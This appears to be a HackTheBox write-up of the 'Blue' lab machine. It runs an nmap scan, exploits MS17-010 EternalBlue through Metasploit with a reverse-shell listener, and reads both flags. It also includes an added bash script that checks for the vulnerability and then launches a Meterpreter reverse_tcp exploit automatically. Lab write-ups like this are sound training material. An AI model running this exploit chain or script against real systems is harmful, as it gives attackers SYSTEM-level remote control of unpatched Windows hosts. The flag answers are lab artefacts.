Nmap scan (service/version detection with OS guessing and SMB host scripts).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2008 SP2 (96%), Microsoft Windows 7 (96%), Microsoft Windows 7 SP0 - SP1 or Windows Server 2008 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 SP1 (96%), Microsoft Windows 7 Ultimate (96%), Microsoft Windows 8.1 (96%), Microsoft Windows 8.1 Update 1 (96%), Microsoft Windows Vista or Windows 7 SP1 (96%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1m33s, deviation: 1s, median: 1m32s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-03-08T16:52:23+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-03-08T16:52:25
|_ start_date: 2020-03-08T16:46:59
Wow!!! There are a lot of open ports, and I can see that it is Windows 7 Professional 7601 Service Pack 1. The interesting part is SMB on 445: an unpatched Windows 7 SP1 box with SMBv1 exposed is the classic MS17-010 (EternalBlue) target, and the host scripts also show SMB message signing disabled, which is the default on this version. There are many ways to hack into this machine; here I use Metasploit to get a shell on it.
Metasploit
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.10.40
rhosts => 10.10.10.40
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lport 4444
lport => 4444
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
After the exploit completes successfully we get a Meterpreter session. The module only has one target (x64 Windows 7 / Server 2008 R2), and VERIFY_ARCH and VERIFY_TARGET are left at true so it refuses to fire if the remote OS or architecture does not match; EternalBlue is a kernel exploit, so a wrong target can blue-screen the box instead of giving a shell.
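Before throwing a kernel exploit at a host it is worth confirming MS17-010 with a non-destructive check and letting the Metasploit module run its own `check` first. The script below is an added example and not part of the original write-up: it classifies the output of nmap's `smb-vuln-ms17-010` NSE script, and writes an msfconsole resource file that runs `check` before `exploit`. The addresses 10.10.10.40 and 10.10.14.5 come from the write-up; the function names, the payload choice, and the sample NSE output embedded for testing are assumptions made here.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up. Assumes nmap and msfconsole
# are on PATH when run for real; the functions themselves work offline.

# Classify `nmap -p445 --script smb-vuln-ms17-010 <host>` output read from stdin.
# Prints one word:
#   vulnerable    - NSE reported "State: VULNERABLE"
#   inconclusive  - the script could not complete its probe (no SMBv1, RPC error...)
#   not-flagged   - the script printed nothing; note this also covers a host with
#                   SMBv1 disabled, so it is absence of evidence, not proof of a patch
classify_ms17_010() {
    local out
    out=$(cat)
    if printf '%s\n' "$out" | grep -q 'State: VULNERABLE'; then
        echo vulnerable
    elif printf '%s\n' "$out" | grep -Eq 'Could not (connect|negotiate)|ERROR|SMB: Failed'; then
        echo inconclusive
    else
        echo not-flagged
    fi
}

# Emit an msfconsole resource script for the write-up's module. The payload is set
# explicitly (the module's default for this target), `check` runs the module's own
# MS17-010 probe, and `exploit -z` backgrounds the session instead of entering it.
ms17_010_rc() {
    local rhost=$1 lhost=$2 lport=${3:-4444}
    cat <<EOF
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $rhost
set LHOST $lhost
set LPORT $lport
set PAYLOAD windows/x64/meterpreter/reverse_tcp
check
exploit -z
EOF
}

# Constructed sample in the shape of the NSE script's output for a vulnerable host
# (trimmed; the real script also prints references and a disclosure date).
SAMPLE_VULN='| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH'

# Scan, classify, and only then hand off to Metasploit.
main() {
    local rhost=$1 lhost=$2 verdict
    verdict=$(nmap -Pn -p445 --script smb-vuln-ms17-010 "$rhost" | classify_ms17_010)
    echo "[*] $rhost: $verdict"
    if [ "$verdict" = vulnerable ]; then
        ms17_010_rc "$rhost" "$lhost" > ms17_010.rc
        msfconsole -q -r ms17_010.rc
    else
        echo "[!] not exploiting: verdict was '$verdict'" >&2
        return 1
    fi
}

# Usage: ./ms17_check.sh 10.10.10.40 10.10.14.5
if [ $# -ge 2 ]; then main "$@"; fi
```

Keeping the `check` step in the resource file costs one extra SMB transaction and is the difference between a clean session and a crashed target on a host that turns out to be patched or the wrong architecture.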
Getting User.txt
C:\Users\haris>cd Desktop
cd Desktop
C:\Users\haris\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\Users\haris\Desktop
24/12/2017 03:23 <DIR> .
24/12/2017 03:23 <DIR> ..
21/07/2017 07:54 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 15,763,046,400 bytes free
C:\Users\haris\Desktop>type user.txt
type user.txt
4c546aea7dbee75cbd71de245c8deea9
Getting Root.txt
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\Users\Administrator\Desktop
24/12/2017 03:22 <DIR> .
24/12/2017 03:22 <DIR> ..
21/07/2017 07:57 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 15,753,887,744 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
ff548eb71e920ff6c08843ce9df4e717
EternalBlue runs in the kernel, so the reverse shell comes back as NT AUTHORITY\SYSTEM and we can read both user.txt and root.txt straight away, with no privilege escalation step needed.
If you like my work, please do consider giving me +rep on HACKTHEBOX.
My HackTheBox profile: https://www.hackthebox.eu/home/users/profile/291968